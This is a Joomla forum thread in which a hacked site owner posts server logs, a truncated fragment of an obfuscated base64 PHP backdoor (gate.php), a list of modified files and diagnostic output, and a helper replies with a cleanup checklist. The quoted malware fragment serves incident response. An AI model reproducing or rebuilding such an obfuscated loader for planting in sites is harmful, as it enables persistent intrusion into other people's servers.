Hacked site

earfoon · Post by **earfoon** » Tue May 20, 2014 12:25 pm

Can someone help me to resolve this. i'm really new on this.

This is log i got from my host after hacking.

82.146.54.233 - - [19/May/2014:11:34:01 +0200] "GET /plugins/user/profile/profiles/gate.php?update HTTP/1.0" 200 266 "-" "-"
82.146.54.233 - - [19/May/2014:11:34:01 +0200] "GET /plugins/user/profile/profiles/gate.php HTTP/1.0" 200 257 "-" "-"
82.146.54.233 - - [19/May/2014:11:34:02 +0200] "GET /plugins/user/profile/profiles/gate.php?update HTTP/1.0" 200 266 "-" "-"

The coded file:

<?php $GLOBALS['_397785576_']=Array(base64_decode('' .'aW5' .'pX3' .'NldA=='),base64_decode('ZX' .'J' .'yb3J' .'fcmVwb3J0' .'aW5n'),base64_decode('c2V' .'0' .'X3RpbW' .'Vf' .'bG' .'ltaXQ='),base64_decode('YXJ' .'yk9S','V' .'XB'
.'kYX' .'Rl' .'I' .'E9L','ZmFpbGV' .'kI' .'HRvIHJ' .'lY2' .'VpdmUgZ2F0ZSBjb2' .'RlC'

List over files that were changed over 24H

./www/WEBSITE/cache/Gantry/0d3bfbb7061e2e1506de616565d1285a-cache-Gantry-e5afa4a2bad1cb370655469bf0dfcf23.php
./www/WEBSITE/cache/js-d41d8cd98f00b204e9800998ecf8427e.php
./www/WEBSITE/cache/js-8598b178a25554bb7374be106e3c5d82.php
./www/WEBSITE/cache/js-46a88695e52012b72f7a35f39511a7c5.php
./www/WEBSITE/cache/js-206d51e1937753b9a47fd2c6e079b29d.php
./www/WEBSITE/cache/js-d6b617d43d903a347e62e1d8f8edbaf5.php
./www/WEBSITE/cache/js-38d716b5110a0ee4ebc7d5bdfa28013e.php
./www/WEBSITE/cache/js-8fdf0f5578c8931724a4c064c635d8ef.php
./www/WEBSITE/cache/js-9bb622fe9e007f29b9be0e3865306230.php
./www/WEBSITE/cache/js-1cb1c720832853b3f64a06a99896eeb0.php
./www/WEBSITE/cache/js-00d6cc5dee3b67fd9c06f6c28e90ca51.php
./www/WEBSITE/cache/js-494107fc903bb31200a7f4be2bf2b6ec.php
./www/WEBSITE/cache/js-0b066290a73e19980e92c457d92c4468.php
./www/WEBSITE/cache/js-e1e1ef3102c558dacb7abc831d6e2765.php
./www/WEBSITE/cache/js-7679f0e1feaf187750fc73bb8b07cc2c.php
./www/WEBSITE/components/com_rokgallery/templates/detail/default/light/css-1013affb563a26f599faa441eb5b29a8.php
./www/WEBSITE/components/com_rokgallery/templates/detail/default/css-99fc08208762dc0b6555838ca7d57258.php
./www/WEBSITE/components/com_rokgallery/templates/gallery/grid-4col/light/css-4da729c93967af19815957f190a7b211.php
./www/WEBSITE/components/com_rokgallery/templates/gallery/grid-4col/css-ea751b7d4c0c0e1c9d5412c7ad87f108.php
./www/WEBSITE/joomla/logs/error.php
./www/WEBSITE/joomla/logs/rokcommon.php
./www/WEBSITE/joomla/logs/gantry.php
./www/WEBSITE/libraries/gantry/css/css-b825f3c52f788bffb336b70841e64d5d.php
./www/WEBSITE/libraries/gantry/css/css-902f0d294efd08672204c01d491eb919.php
./www/WEBSITE/libraries/gantry/css/css-41c297185ff29837536827e53ca722d0.php
./www/WEBSITE/media/com_hikashop/css/css-d3f58244aa2f9cd247515739ba186d79.php
./www/WEBSITE/media/system/css/css-d88325c26fccffc16fdcbe6895c17519.php
./www/WEBSITE/modules/mod_rokgallery/templates/grid/light/css-bc31b451fc22a2621376615cfdcf4ab6.php
./www/WEBSITE/modules/mod_rokgallery/templates/grid/css-e731e93d41587b2b0f552ba238cafbf0.php
./www/WEBSITE/modules/mod_rokgallery/templates/slideshow/light/css-a3de83ea265ec67ab243d47e6dfec3d8.php
./www/WEBSITE/modules/mod_rokgallery/templates/slideshow/css-14aa8dfa2caa63ef496008689684a8ed.php
./www/WEBSITE/plugins/content/bo_videojs/videojs/css-08d9a938fc801d9e38b7260f929a90aa.php
./www/WEBSITE/plugins/system/rokbox/assets/styles/css-0080410c4b23ad58fb14fc3c91b97c24.php
./www/WEBSITE/plugins/user/profile/profiles/gate.php
./www/WEBSITE/templates/rt_clarion/css/css-0697c68f08763c45b38aba72c1bdf97d.php
./www/WEBSITE/templates/rt_clarion/css/css-83e55d3a8e0452f1569abb37b924aa1f.php
./www/WEBSITE/templates/rt_clarion/css/css-846e37eaae2ec98a6af101399deb80ab.php
./www/WEBSITE/templates/rt_clarion/css/css-937e14d7ecf7291d90a2663929f7d463.php
./www/WEBSITE/templates/rt_clarion/css/css-9e836534c65ed9ed774845184a070283.php
./www/WEBSITE/templates/rt_clarion/css/css-a1f198f3b9390febc4e777c9ba97cd2a.php
./www/WEBSITE/templates/rt_clarion/css/css-b95d508c3453e157fd72411ea70c82d7.php
./www/WEBSITE/templates/rt_clarion/css/css-e3bd606d3a91a6de17517bcb5316aa57.php

They suspect this file:

./www/WEBSITE/plugins/user/profile/profiles/gate.php ?

EXTERNAL CALL, WHICH TAKES LONG TIME:

stat("/etc/resolv.conf", {st_mode=S_IFREG|0644, st_size=100, ...}) = 0
socket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP) = 4
connect(4, {sa_family=AF_INET, sin_port=htons(53),
sin_addr=inet_addr("94.242.221.173")}, 16) = -1 EINPROGRESS (Operation
now in progress)
clock_gettime(CLOCK_MONOTONIC, {1182710, 905011321}) = 0
poll([{fd=4, events=POLLOUT}], 1, 299997

Post by **mandville** » Tue May 20, 2014 1:57 pm

its more helpful to see the forum sticky called "before you post - read and action this " and run the fpa and post its output.

[ ] Download and RUN the Forum Post Assistant / FPA Instructions available here and are also included in the download package. Post the generated results in your security/been hacked topic. Use these links to download the FPA:
Download .tar.gz version or Download the .zip version NOTE: Do not download the FPA from any other website or links found on the Internet.

[ ] Ensure you have the latest version of Joomla for your version of Joomla. Delete all files in your Joomla installation, saving a copy of the configuration.php file.

[ ] Review Vulnerable Extensions List to make sure any 3rd party extensions versions used appear on the vulnerable list.

[ ] Review and action Security Checklist 7 Make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, virus, trojans, spyware, etc. Checklist 7 contains a list or recommended scanners.

[ ] Change all passwords and if possible user names for the website host control panel. Change the Joomla database user name and password.

[ ] Use proper permissions on files and directories. They should never be 777, ideal is 644 for files and 755 for directories. The configuration file can be set to 444 which is read only.

[ ] Check your htaccess for for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

[ ] Ensure you do not have anonymous ftp enabled.

[ ] Verify individually that any non-Joomla file such as but not limited to that will be placed back on the website such as images, pdf files, files for download, and other documents and files are valid and are supposed to be part of your website.

[ ] Replace the deleted files by

[*]Create a new database and install without sample data to it(make sure it the same version as previous site).
[*] Install the 3rd party extensions(including any custom template) to the new Joomla. (That insures you have the files in place for the 3rd party extensions)
[*] Edit the configuration.php file of the new Joomla to connect to your original database.
[*] Make a backup and update to the current full version of Joomla

Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in various files and directories More detailed information can be found in the Security Checklist 7 document.

earfoon · Post by **earfoon** » Wed May 21, 2014 6:38 am

Thank you Mandville.

Underneth you will se the outcome of the FPA:

Problem Description :: Forum Post Assistant (v1.2.4) : 20th May 2014 wrote:Hacked site

Forum Post Assistant (v1.2.4) : 20th May 2014 wrote:
Basic Environment :: wrote:Joomla! Instance :: Joomla! 2.5.8-Stable (Ember) 8-November-2012
Joomla! Platform :: Joomla Platform 11.4.0-Stable (Brian Kernighan) 03-Jan-2012
Joomla! Configured :: Yes | Read-Only (444) | Owner: web1266 (uid: 1/gid: 1) | Group: web1266 (gid: 1) | Valid For: 2.5
Configuration Options :: Offline: 1 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.32-55-server | Technology: x86_64 | Web Server: Apache | Encoding: gzip,deflate,sdch | Doc Root: /home/web1266/www/earfoon.no | System TMP Writable: Yes

PHP Configuration :: Version: 5.3.2-1ubuntu4.24 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: | Error Reporting: 22527 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 128M | Max. POST Size: 128M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 256M

MySQL Configuration :: Version: 5.0.51a-24+lenny5 (Client:5.1.73) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 20.95 MiB | #of Tables: 113
Detailed Environment :: wrote:PHP Extensions :: Core (5.3.2-1ubuntu4.24) | date (5.3.2-1ubuntu4.24) | ereg () | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | bz2 () | calendar () | ctype () | dba () | dom (20031129) | hash (1.0) | fileinfo (1.0.5-dev) | filter (0.11.0) | ftp () | gettext () | session () | iconv () | json (1.2.1) | mbstring () | SPL (0.2) | standard (5.3.2-1ubuntu4.24) | posix () | Reflection ($Revision: 293036 $) | Phar (2.0.1) | shmop () | SimpleXML (0.1) | soap () | sockets () | exif (1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $) | sysvmsg () | sysvsem () | sysvshm () | tokenizer (0.1) | wddx () | xml () | xmlreader (0.1) | xmlwriter (0.1) | zip (1.9.1) | cgi-fcgi () | curl () | gd () | imagick (2.1.1-rc1) | imap () | mcrypt () | mysql (1.0) | mysqli (0.1) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_sqlite (1.0.1) | SQLite (2.0-dev) | sqlite3 (0.7-dev) | tidy (2.0) | xmlrpc (0.51) | xsl (0.1) | mhash () | ionCube Loader () | Zend Guard Loader () | Zend Engine (2.3.0) |
Potential Missing Extensions :: suhosin |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) :: Oldsite/ (777) | img/ (777) | joomla/ (777) | txt/ (777) |
Extensions Discovered :: wrote:Components :: SITE :: WF_AGGREGATOR_VIMEO_TITLE (2.2.7.2) | WF_AGGREGATOR_[youtube]_TITLE (2.2.7.2) | WF_FILESYSTEM_JOOMLA_TITLE (2.2.7.2) | WF_LINKS_JOOMLALINKS_TITLE (2.2.7.2) | WF_MEDIAPLAYER_JCEPLAYER_TITLE (2.2.7.2) | WF_POPUPS_JCEMEDIABOX_TITLE (2.2.7.2) | WF_POPUPS_WINDOW_TITLE (2.2.7.2) | WF_LINK_SEARCH_TITLE (2.2.7.2) | WF_ANCHOR_TITLE (2.2.7.2) | WF_ARTICLE_TITLE (2.2.7.2) | WF_AUTOSAVE_TITLE (2.2.7.2) | WF_BROWSER_TITLE (2.2.7.2) | WF_CLEANUP_TITLE (2.2.7.2) | WF_CONTEXTMENU_TITLE (2.2.7.2) | WF_DIRECTIONALITY_TITLE (2.2.7.2) | WF_FULLSCREEN_TITLE (2.2.7.2) | WF_IMGMANAGER_TITLE (2.2.7.2) | WF_INLINEPOPUPS_TITLE (2.2.7.2) | WF_KITCHENSINK_TITLE (2.2.7.2) | WF_LAYER_TITLE (2.2.7.2) | WF_LINK_TITLE (2.2.7.2) | WF_MEDIA_TITLE (2.2.7.2) | WF_NONBREAKING_TITLE (2.2.7.2) | WF_PASTE_TITLE (2.2.7.2) | WF_PREVIEW_TITLE (2.2.7.2) | WF_PRINT_TITLE (2.2.7.2) | WF_SEARCHREPLACE_TITLE (2.2.7.2) | WF_SOURCE_TITLE (2.2.7.2) | WF_SPELLCHECKER_TITLE (2.2.7.2) | WF_STYLE_TITLE (2.2.7.2) | WF_TABLE_TITLE (2.2.7.2) | WF_TEXTCASE_TITLE (2.2.7.2) | WF_VISUALBLOCKS_TITLE (2.2.7.2) | WF_VISUALCHARS_TITLE (2.2.7.2) | WF_XHTMLXTRAS_TITLE (2.2.7.2) | com_mailto (2.5.0) | com_wrapper (2.5.0) |
Components :: ADMIN :: com_admin (2.5.0) | com_banners (2.5.0) | com_cache (2.5.0) | com_categories (2.5.0) | com_checkin (2.5.0) | com_config (2.5.0) | com_content (2.5.0) | com_cpanel (2.5.0) | com_finder (2.5.0) | Gantry (4.1.24) | Hikashop Module (1.0.0) | Hikashop Cart Module (1.0.0) | Hikashop Currency Switcher Mod (1.0.0) | Content - Hikashop Social Plug (1.0.0) | Hikashop History Plugin (1.0.0) | Hikashop User account Plugin (1.0.0) | Hikashop Validate free order P (1.0.0) | Hikashop AlertPay Payment Plug (1.0.0) | Hikashop SIPS ATOS Payment Plu (1.0.0) | Hikashop Authorize.net Payment (1.0.0) | Hikashop Bank Transfer Payment (1.0.0) | Hikashop WorldPay Business Gat (0.0.2) | Hikashop Worldpay Global Gatew (0.0.7) | Hikashop Bluepaid Payment Plug (1.0.0) | Hikashop CardSave Payment Plug (1.0.0) | Hikashop Check Payment Plugin (1.0.0) | Hikashop CyberMuth CIC Payment (1.0.0) | Hikashop Collect On Delivery P (1.0.0) | Hikashop Credit Card Payment P (1.0.0) | Hikashop ePay Payment Plugin (1.0.0) | Hikashop eWAY Payment Plugin (1.0.0) | Hikashop FirstData Payment Plu (1.0.0) | Hikashop Google Checkout Payme (1.0.0) | Hikashop HSBC Payment Plugin (1.0.0) | Hikashop Innovative Gateway Pa (1.0.0) | Hikashop iVeri Payment Plugin (1.0.0) | Hikashop Moneybookers Payment (1.0.0) | Hikashop PayJunction Payment P (1.0.0) | Hikashop Payment Express Payme (1.0.0) | Hikashop Paypal Payment Plugin (1.0.0) | Hikashop Paypal Pro Payment Pl (1.0.0) | Hikashop SagePay Payment Plugi (1.0.0) | Hikashop Servired Payment Plug (1.0.0) | Hikashop Western Union Payment (1.0.0) | Hikashop Australia Post eDeliv (1.0.0) | Hikashop Manual Shipping Plugi (1.0.0) | Hikashop UPS Shipping Plugin (1.0.0) | Search - Hikashop Categories/M (1) | Search - Hikashop Products (1) | Hikashop Registration Redirect (1.0.0) | User - HikaShop (1.0.0) | Hikashop - VirtueMart Fallback (1.0.0) | HikaShop (1.5.7) | com_installer (2.5.0) | Unknown (-) | Editor - JCE (2.2.7.2) | JCE File Browser (2.0.0) | plg_quickicon_jcefilebrowser (2.5.0) | JCE (2.2.7.2) | com_joomlaupdate (2.5.0) | com_languages (2.5.0) | com_login (2.5.0) | com_media (2.5.0) | com_menus (2.5.0) | com_messages (2.5.0) | com_modules (2.5.0) | com_newsfeeds (2.5.0) | com_plugins (2.5.0) | com_redirect (2.5.0) | RokCandy (2.0.0) | RokGallery (2. | com_search (2.5.0) | com_templates (2.5.0) | com_users (2.5.0) | com_weblinks (2.5.0) |

Modules :: SITE :: mod_articles_archive (2.5.0) | mod_articles_categories (2.5.0) | mod_articles_category (2.5.0) | mod_articles_latest (2.5.0) | mod_articles_news (2.5.0) | mod_articles_popular (2.5.0) | mod_banners (2.5.0) | mod_breadcrumbs (2.5.0) | mod_custom (2.5.0) | mod_feed (2.5.0) | mod_finder (2.5.0) | mod_footer (2.5.0) | FXPreview (1.0) | Hikashop Module (1.0.0) | Hikashop Cart Module (1.0.0) | Hikashop Currency Switcher Mod (1.0.0) | Images Crawler (2.0) | iNivoSlider (2.5.0) | mod_languages (2.5.0) | mod_login (2.5.0) | mod_menu (2.5.0) | mod_random_image (2.5.0) | mod_related_items (2.5.0) | RokGallery Module (2. | RokNavMenu (2.0.7) | RokTabs (1.11) | RokTwittie (1.6) | mod_search (2.5.0) | mod_stats (2.5.0) | mod_syndicate (2.5.0) | mod_users_latest (2.5.0) | Vinaora Nivo Slider (2.5.2) | mod_weblinks (2.5.0) | mod_whosonline (2.5.0) | mod_wrapper (2.5.0) | MOD_ITPFBLIKEBOX (1.7) | RS Cool Mp3 Player (1.2) |
Modules :: ADMIN :: mod_custom (2.5.0) | mod_feed (2.5.0) | mod_latest (2.5.0) | mod_logged (2.5.0) | mod_login (2.5.0) | mod_menu (2.5.0) | mod_multilangstatus (2.5.0) | mod_popular (2.5.0) | mod_quickicon (2.5.0) | mod_status (2.5.0) | mod_submenu (2.5.0) | mod_title (2.5.0) | mod_toolbar (2.5.0) | mod_version (2.5.0) |

Plugins :: SITE :: plg_authentication_gmail (2.5.0) | plg_authentication_joomla (2.5.0) | plg_authentication_ldap (2.5.0) | plg_captcha_recaptcha (2.5.0) | Content - bo:VideoJS (1.5.0) | plg_content_emailcloak (2.5.0) | plg_content_finder (2.5.0) | plg_content_geshi (2.5.0) | Content - Hikashop Social Plug (1.0.0) | plg_content_joomla (2.5.0) | plg_content_loadmodule (2.5.0) | plg_content_pagebreak (2.5.0) | plg_content_pagenavigation (2.5.0) | Content - RokBox (2.0.7) | plg_content_vote (2.5.0) | plg_editors-xtd_article (2.5.0) | plg_editors-xtd_image (2.5.0) | plg_editors-xtd_pagebreak (2.5.0) | plg_editors-xtd_readmore (2.5.0) | Button - RokCandy (2.0.0) | Button - RokGallery (2. | Button - RokBox (2.0.7) | plg_editors_codemirror (1.0) | Editor - JCE (2.2.7.2) | Editor - RokPad (2.0.4) | plg_editors_tinymce (3.5.4.1) | plg_extension_joomla (2.5.0) | plg_finder_categories (2.5.0) | plg_finder_contacts (2.5.0) | plg_finder_content (2.5.0) | plg_finder_newsfeeds (2.5.0) | plg_finder_weblinks (2.5.0) | Hikashop History Plugin (1.0.0) | Hikashop User account Plugin (1.0.0) | Hikashop Validate free order P (1.0.0) | Hikashop AlertPay Payment Plug (1.0.0) | Hikashop SIPS ATOS Payment Plu (1.0.0) | Hikashop Authorize.net Payment (1.0.0) | Hikashop Bank Transfer Payment (1.0.0) | Hikashop WorldPay Business Gat (0.0.2) | Hikashop Worldpay Global Gatew (0.0.7) | Hikashop Bluepaid Payment Plug (1.0.0) | Hikashop CardSave Payment Plug (1.0.0) | Hikashop Check Payment Plugin (1.0.0) | Hikashop CyberMuth CIC Payment (1.0.0) | Hikashop Collect On Delivery P (1.0.0) | Hikashop Credit Card Payment P (1.0.0) | Hikashop ePay Payment Plugin (1.0.0) | Hikashop eWAY Payment Plugin (1.0.0) | Hikashop FirstData Payment Plu (1.0.0) | Hikashop Google Checkout Payme (1.0.0) | Hikashop HSBC Payment Plugin (1.0.0) | Hikashop Innovative Gateway Pa (1.0.0) | Hikashop iVeri Payment Plugin (1.0.0) | Hikashop Moneybookers Payment (1.0.0) | Hikashop PayJunction Payment P (1.0.0) | Hikashop Payment Express Payme (1.0.0) | Hikashop Paypal Payment Plugin (1.0.0) | Hikashop Paypal Pro Payment Pl (1.0.0) | Hikashop SagePay Payment Plugi (1.0.0) | Hikashop Servired Payment Plug (1.0.0) | Hikashop Western Union Payment (1.0.0) | Hikashop Australia Post eDeliv (1.0.0) | Hikashop Manual Shipping Plugi (1.0.0) | Hikashop UPS Shipping Plugin (1.0.0) | plg_quickicon_extensionupdate (2.5.0) | plg_quickicon_jcefilebrowser (2.5.0) | plg_quickicon_joomlaupdate (2.5.0) | plg_search_categories (2.5.0) | plg_search_contacts (2.5.0) | plg_search_content (2.5.0) | Search - Hikashop Categories/M (1) | Search - Hikashop Products (1) | plg_search_newsfeeds (2.5.0) | plg_search_weblinks (2.5.0) | System - BIGSHOT Google Analyt (1.7) | plg_system_cache (2.5.0) | plg_system_debug (2.5.0) | System - Gantry (4.1.24) | plg_system_highlight (2.5.0) | Hikashop Registration Redirect (1.0.0) | User - HikaShop (1.0.0) | plg_system_languagecode (2.5.0) | plg_system_languagefilter (2.5.0) | plg_system_log (2.5.0) | plg_system_logout (2.5.0) | plg_system_p3p (2.5.0) | plg_system_redirect (2.5.0) | plg_system_remember (2.5.0) | System - RokBox (2.0.7) | System - RokCandy (2.0.0) | System - RokCommon (3.1.6) | System - RokExtender (2.0.0) | System - RokGallery (2. | System - RokGZipper (1.0) | plg_system_sef (2.5.0) | Hikashop - VirtueMart Fallback (1.0.0) | manage.myJoomla.com Secure Plu (n/a) | plg_user_contactcreator (2.5.0) | plg_user_joomla (2.5.0) | plg_user_profile (2.5.0) |
Templates Discovered :: wrote:Templates :: SITE :: atomic (2.5.0) | beez5 (2.5.0) | beez_20 (2.5.0) | fjt001_j25 (2.5.0) | fjt004_j25 (2.5.0) | JSN_Teki_FREE (1.1.0) | rt_clarion (1.1) | themza_j16_03 (1.6.0) |
Templates :: ADMIN :: bluestork (2.5.0) | hathor (2.5.0) |

Post by **mandville** » Wed May 21, 2014 11:00 am

Quick summary.
Joomla and various extension out of date/vulnerable
Folder permission set wrong allowing possible malicious uploads .
Follow checklist 7

The Joomla! Forum™

Hacked site

Hacked site

Re: Hacked site

Re: Hacked site

Re: Hacked site